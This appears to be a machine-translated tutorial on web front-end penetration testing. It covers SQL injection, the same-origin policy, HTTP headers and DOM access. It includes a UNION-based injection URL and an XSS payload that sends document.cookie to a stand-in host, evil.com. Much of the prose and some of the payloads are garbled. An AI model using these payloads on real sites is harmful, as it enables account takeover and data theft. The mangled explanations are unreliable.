Summary of Web front-end Penetration Testing technology (I.)

First of all, correct your attitude and do not violate the law.

1. SQL injection Test

For Web pages that have SQL injection, use SQL statements to correlate queries (modeled in C/s mode) eg http://www.foo.com/user.php?id=1

Common such URLs, so that after committing to the server can only return the general information id=1. Database Association query http://www.foo.com/user.php?id=1 Union where id=1 Union select Password, 1,a from users such SQL statements are legal, If the application that brushed its end had a SQL injection problem, he would think it was a legitimate commit query, and the user's password would leak when such a commit occurred. And the password account can also be tested.

2. XSS Cross-site scripting attack

This first explains the cross-site script eg <script>eval (LOCATION.HASH.SUBSTR (1)); </script> This code is saved to http://www.foo.com/info/html, JavaScript built-in function eval can invoke JavaScript statements dynamically, Location.hash gets the content behind the # in the link http://www.foo.com/info.html#callback, SUBSTR is the character creation intercept function, and location.hash.substr (1) means that the content behind the Intercept # is executed dynamically by the Eval function.

Now construct the XSS link script statement, Http://www.foo.com/info.html#new%20Image (). src= "http://evil.com/steal.php?c=" +escape ( Document.cookie) The browser executes the hind script to become eval (' New Image (). src= "http://www/evil.com/steal.php?c=" Escape (Document.cookie)) This makes it possible to obtain cookie information across stations and use cookies to log in to an attacker's account for unauthorized operation.

3. Homologous strategy

Different client scripts cannot read and write to each other's resources without authorization.

The so-called same domain refers to the same protocol, the Tong domain name, Tong port, commonly said two sites in the same domain refers to their homologous.

Client script mainly refers to JavaScript and ActionScript (Flash scripting language), and both follow the ECMAScript scripting Standard, Flash provides a communication interface, two scripts can communicate with each other. Here is a description of Ajax is a form of asynchronous transfer of data in the background, do not need to refresh the Web page can modify the background data.

The so-called authorization is the target station explicitly return HTTP response header access-control-allow-origin:http://ww.evil.com so Ajax technology on the www.foo.com data read and write operations.

Read and Write permissions, the Web on the resources for different users with different permissions, HTTP request Referer is only readable, but Document.cookie has read and write.

Resources, this is only a cross-guard resource, including HTTP headers, the entire DOM tree, browser storage cookies, Flash cookies, localstorage.

4. HTTP protocol

In the packet capture analysis, it is often seen that the HTTP protocol link is immediately disconnected or delayed, and each request is re-established.

GET http://www.foo.com/HTTP/1.1

Host:www.foo.com
Connection:keep-alive
Cache-control:max-age=0
user-agent:mozilla/5.0 (Windows NT 6.1) applewebkit/535.19 (khtml, like
Gecko) chrome/18.0.1025.3 safari/535.19
referer:http://www.baidu.com/
accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-encoding:gzip,deflate,sdch

accept-language:zh-cn,zh;q=0.8
accept-charset:gbk,utf-8;q=0.7,*;q=0.3
Cookie:sessionid=58ab420b1d8b800526acccaa83a827a3:fg=1

The response is as follows:
http/1.1 OK
Date:sun, 22:48:31 GMT
server:apache/2.2.8 (WIN32) php/5.2.6
set-cookie:ptoken=; Expires=mon, 1970 00:00:00 GMT; path=/;
domain=.foo.com; HttpOnly
SET-COOKIE:USERID=C7888882E039B32FD7B4D3; Expires=tue, Jan 2030
00:00:00 GMT; path=/; Domain=.foo.com
x-powered-by:php/5.2.6
content-length:3635
Keep-alive:timeout=5, max=100
Connection:keep-alive
Content-type:text/html;charset=gbk

4, IFRAME tag is an important tag in HTML, is the highest frequency of web security, many sites through this tag embedded third-party content, such as advertising page.

5, privacy acquisition, through JavaScript statements can be constructed function to get the corresponding value, document.getElementById (' private_msg '). innerHTML This means getting the contents of the HTML data inside the tag object, You can also borrow the DOM to accept the tag name for further querying, Document.getelementbytagnmae (' div) [2].innerhtml; using the function getElementsByTagName accepts the tag name and returns an array. The cookie value can also be obtained in this way, Document.cookie

Time-consuming side hate less ...

Web Front End Penetration Testing Technology Summary (i)